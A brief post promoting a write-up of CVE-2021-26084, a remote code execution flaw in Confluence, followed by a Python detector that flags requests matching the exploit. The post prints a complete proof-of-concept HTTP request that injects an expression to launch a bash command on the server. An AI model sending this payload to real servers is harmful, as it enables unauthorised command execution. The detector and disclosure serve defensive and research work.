Remote Code Execution on Confluence Servers write-up (CVE-2021-26084) by rootxharsh and iamnoooob

Patch diffing the latest Confluence update results in RCE PoC.

PoC:

POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded

queryString=aaa'%2b#{""["class"].forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("var x=new java.lang.ProcessBuilder;x.command(['/bin/bash','-c','.$cmd.']);x.start()")}%2b'

Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
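
A defender-side check for requests shaped like the PoC above, added here as an example and not taken from the write-up: it decodes form parameters, including double URL-encoding, and flags the strings visible in the PoC body. The function names, indicator labels, decode-round limit and sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, quote, unquote

POC_PATH = "/pages/doenterpagevariables.action"  # endpoint named in the PoC
# Strings visible in the PoC body; the indicator names are labels made up here.
INDICATORS = {
    "hash_brace": re.compile(r"#\{"),
    "forname_reflection": re.compile(r"forName\s*\("),
    "script_engine": re.compile(r"javax\.script\.ScriptEngineManager"),
    "process_builder": re.compile(r"java\.lang\.ProcessBuilder"),
}
MAX_DECODE_ROUNDS = 3  # assumption: how many nested URL-encodings to unwrap

def fully_decode(value):
    """Undo repeated percent-encoding so a double-encoded body is still seen."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_form_body(body):
    """Return {parameter: [indicator names]} for form fields matching the PoC."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        hits = set()
        for raw in values:  # parse_qs has already decoded one layer
            text = fully_decode(raw)
            hits.update(k for k, rx in INDICATORS.items() if rx.search(text))
        if hits:
            findings[name] = sorted(hits)
    return findings

def triage(path, body):
    """Rate a POST: 'high' on the PoC endpoint, 'medium' elsewhere, else None."""
    findings = inspect_form_body(body)
    if not findings:
        return None
    severity = "high" if path.split("?", 1)[0] == POC_PATH else "medium"
    return severity, findings

# Constructed samples: inert PoC-shaped fragment, double-encoded form, benign form.
POC_VALUE = 'aaa\'+#{""["class"].forName("javax.script.ScriptEngineManager")}+\''
SAMPLE_PLAIN = "queryString=" + quote(POC_VALUE, safe="")
SAMPLE_DOUBLE = "queryString=" + quote(quote(POC_VALUE, safe=""), safe="")
SAMPLE_BENIGN = "queryString=release+notes&spaceKey=DOCS"
```

Matches on these strings are a triage signal for review of the request, not proof of compromise; patch status of the server decides whether a hit mattered.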